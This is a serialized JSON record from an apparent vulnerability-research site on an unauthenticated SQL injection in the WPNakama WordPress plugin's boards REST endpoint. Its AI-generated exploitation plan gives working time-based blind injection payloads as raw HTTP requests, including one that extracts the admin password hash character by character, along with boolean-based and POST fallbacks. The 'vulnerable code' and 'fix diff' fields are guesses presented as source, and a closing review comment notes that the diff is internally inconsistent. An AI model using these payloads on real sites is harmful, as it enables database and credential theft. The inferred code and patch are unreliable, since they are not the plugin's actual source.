[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMV9OtyKGN-WNVOhFAHPCus0c7SlI_f1146oi0jd_0J0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2495","wpnakama-unauthenticated-sql-injection-via-order-rest-api-parameter","WPNakama \u003C= 0.6.5 - Unauthenticated SQL Injection via 'order' REST API Parameter","The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wpnakama",null,"\u003C=0.6.5","0.6.6","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-17 20:24:50","2026-02-18 08:26:03",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7ffa92be-9d38-40d9-954d-d890136b5aa1?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2495 (WPNakama SQL Injection)\n\n## 1. Vulnerability Summary\n**CVE-2026-2495** is an unauthenticated SQL Injection vulnerability in the **WPNakama** plugin (versions \u003C= 0.6.5). The vulnerability exists within the REST API endpoint `\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards`. The plugin fails to sufficiently sanitize or prepare the `order` parameter before incorporating it into a SQL query's `ORDER BY` clause. This allows an attacker to manipulate the query logic, leading to the extraction of sensitive data via time-based or boolean-based blind techniques.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards`\n- **Method:** `GET` (inferred, as \"boards\" listing is typically a GET request)\n- **Vulnerable Parameter:** `order`\n- **Authentication:** Unauthenticated (CVSS PR:N). The REST route likely lacks a restrictive `permission_callback`.\n- **Preconditions:** At least one \"board\" must exist in the system for the SQL query to execute and reflect the injection logic.\n\n## 3. Code Flow (Inferred)\n1.  
**Route Registration:** The plugin registers the route in a function hooked to `rest_api_init`.\n    ```php\n    \u002F\u002F Inferred registration logic\n    register_rest_route('WPNakama\u002Fv1', '\u002Fboards', [\n        'methods'  => 'GET',\n        'callback' => [ $this, 'get_boards' ],\n        'permission_callback' => '__return_true', \u002F\u002F Vulnerable point\n    ]);\n    ```\n2.  **Handler Execution:** The callback (e.g., `get_boards`) retrieves the `order` parameter from the `WP_REST_Request` object.\n3.  **Vulnerable Sink:** The code constructs a SQL query, likely using `$wpdb->get_results()`. The `order` parameter is concatenated directly into the `ORDER BY` clause without being validated against a whitelist (like `ASC`\u002F`DESC`) or passed through `$wpdb->prepare()`.\n    ```php\n    \u002F\u002F Inferred vulnerable sink\n    $order = $request->get_param('order');\n    $query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $order;\n    $results = $wpdb->get_results($query);\n    ```\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this is an **unauthenticated** SQL injection. WordPress REST API endpoints typically do not require a `_wpnonce` for `GET` requests unless they perform state-changing operations or specific capability checks.\n\n**Validation Step:**\nIf the endpoint returns a `403 Forbidden` or `rest_cookie_invalid_nonce` error, use the following strategy:\n1.  Search for any shortcode provided by WPNakama (e.g., `[wpnakama_boards]`) using `grep -r \"add_shortcode\"`.\n2.  Create a public page containing this shortcode.\n3.  Navigate to the page and use `browser_eval` to check for localized scripts:\n    - `browser_eval(\"window.wpNakamaSettings?.nonce\")` (inferred name)\n    - If found, append `?_wpnonce=VALUE` to the REST API request.\n\n## 5. 
Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** because `ORDER BY` injections are most reliably exploited this way.\n\n### Step 1: Baseline Request\nConfirm the endpoint is active and returns data.\n- **Tool:** `http_request`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards`\n- **Method:** `GET`\n\n### Step 2: Confirm Injection (Time-Based)\nInject a `SLEEP()` command into the `order` parameter.\n- **Payload:** `, (SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END))`\n- **URL Encoded:** `%2C%20(SELECT%20(CASE%20WHEN%20(1%3D1)%20THEN%20SLEEP(5)%20ELSE%201%20END))`\n- **Request:**\n  ```http\n  GET \u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards?order=%2C%20(SELECT%20(CASE%20WHEN%20(1%3D1)%20THEN%20SLEEP(5)%20ELSE%201%20END)) HTTP\u002F1.1\n  Host: localhost:8080\n  ```\n- **Expected Result:** Response time > 5 seconds.\n\n### Step 3: Data Extraction (Example: Admin Password Hash)\nWe will test if the first character of the admin password hash is `$`.\n- **Payload:** `, (SELECT (CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$') THEN SLEEP(5) ELSE 1 END))`\n- **URL Encoded:** `%2C%20(SELECT%20(CASE%20WHEN%20(SUBSTRING((SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%3D1)%2C1%2C1)%3D%27%24%27)%20THEN%20SLEEP(5)%20ELSE%201%20END))`\n\n## 6. Test Data Setup\nThe SQL query must return at least one row for the `ORDER BY` clause to trigger the subquery for each row.\n1.  **Activate Plugin:** `wp plugin activate wpnakama`\n2.  **Create Content:** Use WP-CLI to create at least one board (this depends on how the plugin stores boards; usually a custom table).\n    - *Assumption:* Boards are stored in a custom table `wp_nakama_boards`.\n    - `wp db query \"INSERT INTO wp_nakama_boards (title) VALUES ('Test Board')\"` (Verify table name first using `wp db tables`).\n3.  
If boards are a Custom Post Type:\n    - `wp post create --post_type=nakama_board --post_title='Test Board' --post_status=publish`\n\n## 7. Expected Results\n- **Vulnerable:** The server delays the response by the specified number of seconds in the `SLEEP()` function.\n- **Fixed:** The server either ignores the `order` parameter, returns an error for invalid input, or returns the results instantly (parameter sanitized).\n\n## 8. Verification Steps\n1.  **Check Query Log:** Enable the MySQL General Query Log to see the raw query being executed.\n    - `wp db query \"SET GLOBAL general_log = 'ON';\"`\n    - Execute the exploit.\n    - `wp db query \"SELECT argument FROM mysql.general_log WHERE argument LIKE '%boards%' ORDER BY event_time DESC LIMIT 1;\"`\n2.  **Confirm Output:** Ensure the log shows the injected `SLEEP()` command concatenated into the `ORDER BY` clause.\n\n## 9. Alternative Approaches\nIf the `order` parameter is reflected in the response (e.g., in a \"metadata\" section of the JSON output), try **Boolean-based injection**:\n- **True Payload:** `order=id ASC` (Normal response)\n- **False Payload:** `order=id DESC` (Reverse order response)\n- **Injected Logic:** `order=(CASE WHEN (1=1) THEN id ELSE title END)`\n- Compare response structures to determine if the logic is being processed.\n\nIf `GET` is not allowed, retry with `POST` and `Content-Type: application\u002Fjson`:\n- **Body:** `{\"order\": \", (SELECT SLEEP(5))\"}`","The WPNakama plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'order' parameter in its REST API. 
This occurs because the plugin directly concatenates user-supplied input into an ORDER BY clause without validation or parameterization, allowing attackers to extract database information using time-based blind injection techniques.","\u002F\u002F Inferred from research plan: WPNakama\u002Fv1\u002Fboards endpoint handler\n\u002F\u002F Likely located in a file handling REST routes such as includes\u002Fapi\u002Fclass-wp-nakama-boards-controller.php\n\n$order = $request->get_param('order');\n$query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $order;\n$results = $wpdb->get_results($query);","--- a\u002Fwpnakama\u002Fincludes\u002Fapi\u002Fclass-wp-nakama-boards-controller.php\n+++ b\u002Fwpnakama\u002Fincludes\u002Fapi\u002Fclass-wp-nakama-boards-controller.php\n@@ -20,1 +20,3 @@\n- $order = $request->get_param('order');\n- $query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $order;\n+ $order = strtoupper($request->get_param('order'));\n+ $valid_order = in_array($order, ['ASC', 'DESC']) ? $order : 'ASC';\n+ $query = \"SELECT * FROM {$wpdb->prefix}nakama_boards ORDER BY id \" . $valid_order;","The vulnerability is exploited by sending a GET request to the unauthenticated REST API endpoint `\u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards` with a malicious payload in the 'order' parameter. \n\n1. Target: \u002Fwp-json\u002FWPNakama\u002Fv1\u002Fboards\n2. Authentication: None (unauthenticated)\n3. Payload Structure: The attacker appends a subquery to the ORDER BY clause. For example: `, (SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END))`.\n4. Extraction: By monitoring response times, an attacker can perform time-based blind SQL injection to leak sensitive data such as user credentials or configuration details (e.g., `CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$') THEN SLEEP(5) ELSE 1 END`).\n5. 
Precondition: At least one record must exist in the queried table (e.g., a board must be created) for the ORDER BY clause to execute the subquery.","gemini-3-flash-preview","2026-04-19 05:47:27","2026-04-19 05:47:48",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","0.6.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpnakama\u002Ftags\u002F0.6.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpnakama.0.6.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpnakama\u002Ftags"]
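Review bot: in the `research_fix_diff` hunk, the added line `$order = strtoupper($request->get_param('order'));` passes the parameter to a string function before its type is known, so a missing `order` (null) or an array-valued `order` reaches `strtoupper()`; on PHP 8 an array argument raises a TypeError instead of falling back to `'ASC'`. Check `is_string()` before normalising, or give the `order` argument a `validate_callback` in the route registration so anything other than the two allowed values is rejected before the handler runs. Passing `true` as the third argument of `in_array()` would make the allow-list comparison strict. Separately, the hunk header `@@ -20,1 +20,3 @@` declares one old line while two `-` lines follow, so the diff as shown is not internally consistent and should be regenerated from the actual 0.6.5 and 0.6.6 sources.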